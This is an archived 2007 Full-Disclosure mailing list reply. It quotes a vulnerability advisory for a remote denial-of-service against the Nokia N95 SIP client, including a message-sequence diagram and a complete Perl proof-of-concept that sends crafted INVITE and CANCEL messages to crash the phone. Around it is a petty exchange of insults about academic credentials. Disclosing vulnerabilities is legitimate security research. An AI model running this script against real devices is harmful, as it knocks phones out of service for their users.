lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed,  5 Dec 2007 20:57:13 +0100
From: state@...ia.fr
To: reepex <reepex@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Nokia N95 cellphone remote DoS using the SIP
	Stack

hi Reepex,

I do not understand why are frustrated about a computer science degree. Maybe,
someone got dropped out of a degree programm and some psychological trauma gets
 activated when seeing a Ph.D?

If you like it or not, in order to get a computer science degree, you will have
to take classes, and  most classes are taught by Ph.Ds.

I will not argue with you on why I use the Ph.D in my signature, but if you
really want to know, look at our research papers published in academic
journals/conferences. (If you do not find them, I can send them to you).
If you will ever understand the contents, then you will understand what are our
credentials..:) This will probably never happen.

At least, I use a signature and a real name and do not hide behind a gmail
account.

Meanwhile try yourself to find at least one vulnerability and enjoy Perl
programming, it seemes your computer science skills are somehow in this area :)


Greetings




RS


Selon reepex <reepex@...il.com>:

> So almighty Phd what is your thesis exactly?
>
> To me it seems to be  'how to run a fuzzer then write crappy perl  scripts
> to exploit DoS conditions'
>
> does this properly summarize your phd credentials?
>
> I guess  you could tack on 'after writing the crappy scripts, flood mailing
> lists with our crap, and get made fun of'
>
> I am sure you will serve the academic community great one day when teach
> "hacking" classes revolving around the latest editions of hacking exposed
>
>
>
> On Dec 5, 2007 11:05 AM, Radu State <State@...ia.fr> wrote:
>
> >  Nokia N95 cellphone remote DoS using the SIP Stack
> >
> >
> >
> > Severity:
> >
> > High – Denial of Service
> >
> >
> >
> > Hardware:
> >
> > Nokia N95
> >
> >
> >
> > Firmware:
> >
> > Tested version: Nokia RM-159 V 12.0.013
> >
> >
> >
> > Notification:
> >
> > Vulnerability found: 11 September 2007
> >
> > Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
> > Security Support: 19 September 2007 / None reply
> >
> >
> >
> > Vulnerability Synopsis:
> >
> > If the device has the SIP Phone client activated, a sequence of SIP
> > messages turn the device in an inconsistent state where the user is not
> able
> > to operate it anymore until it reboots.
> >
> >
> >
> > The sequence of messages consists in 2 different SIP Dialogs where the
> > first initiates an INVITE transaction but immediately closes it (in an
> > anticipated manner). While, the second transaction initiates a normal
> INVITE
> > transaction that trigger the vulnerability of the target.
> >
> >
> >
> > The sequence of messages is illustrated below.
> >
> >
> >
> > X ------------------------- INVITE -----------------------> Nokiav12
> >
> > X <---------------------- 100 Trying ---------------------- Nokiav12
> >
> > X ------------------------- CANCEL -----------------------> Nokiav12
> >
> > X <----------------- OK (to the Cancel) ------------------- Nokiav12
> >
> >  X <---------------- 487 Request Terminated ---------------- Nokiav12
> >
> >
> >
> > --------New Dialog--------
> >
> >
> >
> > X ------------------------- INVITE -----------------------> Nokiav12
> >
> > X <---------------------- 100 Trying ---------------------- Nokiav12
> >
> > X <---------------------- 180 Trying ---------------------- Nokiav12
> >
> >
> >
> > ---- The device does not work properly anymore ----
> >
> >
> >
> > Impact:
> >
> > A remote entity can take down all the services of the cell phone
> >
> >
> >
> > Resolution:
> >
> > As we did not get any proper reply from Nokia about the subject, the best
> > way will be to disable the SIP Client
> >
> >
> >
> > Credits:
> >
> > Humberto J. Abdelnur (Ph.D Student)
> >
> > Radu State (Ph.D)
> >
> > Olivier Festor (Ph.D)
> >
> >
> >
> > This vulnerability was identified by the Madynes research team at INRIA
> > Lorraine, using KiF the Madynes VoIP fuzzer.
> >
> > http://madynes.loria.fr/
> >
> >
> >
> >
> >
> > Proof of Concept:
> >
> >
> >
> > A perl script (nokiav12.pl) is attached to this mail. Before launching
> >
> > it, the SIP phone has to be initialed in the target device
> >
> >
> >
> > Command:
> >
> > perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
> >
> >
> >
> > Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
> >
> >
> >
> >
> >
> > #!/usr/bin/perl
> >
> >
> >
> > ##################################################
> >
> > # Vulnerabily discovered using KiF ~ Kiph #
> >
> > # #
> >
> > # Authors: #
> >
> > # Humberto J. Abdelnur (Ph.D Student) #
> >
> > # Radu State (Ph.D) #
> >
> > # Olivier Festor (Ph.D) #
> >
> > # #
> >
> > # Madynes Team, LORIA - INRIA Lorraine #
> >
> > # http://madynes.loria.fr #
> >
> > ##################################################
> >
> >
> >
> > use IO::Socket::INET;
> >
> > use String::Random;
> >
> >
> >
> > die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
> >
> > unless ($ARGV[3]);
> >
> >
> >
> > $targetUser = $ARGV[1];
> >
> > $targetIP = $ARGV[0];
> >
> >
> >
> > $attackerUser = $ARGV[3];
> >
> > $attackerIP= $ARGV[2];
> >
> >
> >
> > $socket=new IO::Socket::INET->new(
> >
> > Proto=>'udp',
> >
> > PeerPort=>5060,
> >
> > PeerAddr=>$targetIP,
> >
> > LocalPort=>5060);
> >
> >
> >
> > $foo = new String::Random;
> >
> > $callid= $foo->randpattern("CCccnCn");
> >
> > $cseq = $foo->randregex('\d\d\d\d');
> >
> >
> >
> > $sdp = "v=0\r
> >
> > o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
> >
> > s=-\r
> >
> > c=IN IP4 $attackerIP\r
> >
> > t=0 0\r
> >
> > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
> >
> > a=sendrecv\r
> >
> > a=ptime:20\r
> >
> > a=maxptime:200\r
> >
> > a=fmtp:96 mode-change-neighbor=1\r
> >
> > a=fmtp:18 annexb=no\r
> >
> > a=fmtp:98 0-15\r
> >
> > a=rtpmap:96 AMR/8000/1\r
> >
> > a=rtpmap:0 PCMU/8000/1\r
> >
> > a=rtpmap:8 PCMA/8000/1\r
> >
> > a=rtpmap:97 iLBC/8000/1\r
> >
> > a=rtpmap:18 G729/8000/1\r
> >
> > a=rtpmap:98 telephone-event/8000/1\r
> >
> > a=rtpmap:13 CN/8000/1\r
> >
> > ";
> >
> >
> >
> > $sdplen= length $sdp;
> >
> >
> >
> > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> >
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> >
> > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> >
> > To: <sip:$targetUser\@$targetIP>\r
> >
> > Call-ID: $callid\@$attackerIP\r
> >
> > CSeq: $cseq INVITE\r
> >
> > Max-Forwards: 70\r
> >
> > Contact: <sip:$attackerUser\@$attackerIP>\r
> >
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
> >
> > MESSAGE\r
> >
> > Content-Type: application/sdp\r
> >
> > Content-Length: $sdplen\r
> >
> > \r
> >
> > $sdp";
> >
> > $socket->send($msg);
> >
> > $text = '';
> >
> > while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
> >
> > $socket->recv($text,1024,0);
> >
> > }
> >
> >
> >
> > $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
> >
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> >
> > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> >
> > To: <sip:$targetUser\@$targetIP>;tag=1\r
> >
> > Call-ID: $callid\@$attackerIP\r
> >
> > CSeq: $cseq CANCEL\r
> >
> > Max-Forwards: 70\r
> >
> > Content-Length: 0\r
> >
> > \r
> >
> > ";
> >
> > $socket->send($msg);
> >
> > time.sleep(1);
> >
> > $callid= $foo->randpattern("CCccnCn");
> >
> > $cseq = $foo->randregex('\d\d\d\d');
> >
> > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> >
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
> >
> > From: <sip:$attackerUser\@$attackerIP>;tag=2\r
> >
> > To: <sip:$targetUser\@$targetIP>\r
> >
> > Call-ID: $callid\@$attackerIP\r
> >
> > CSeq: $cseq INVITE\r
> >
> > Contact: <sip:$attackerUser\@$attackerIP>\r
> >
> > Max-Forwards: 70\r
> >
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
> >
> > MESSAGE\r
> >
> > Content-Type: application/sdp\r
> >
> > Content-Length: $sdplen\r
> >
> > \r
> >
> > $sdp";
> >
> > $socket->send($msg);
> >
> >
> >
> >
> >
> >
> >
> > No virus found in this outgoing message.
> > Checked by AVG Free Edition.
> > Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:
> > 04/12/2007 19:31
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ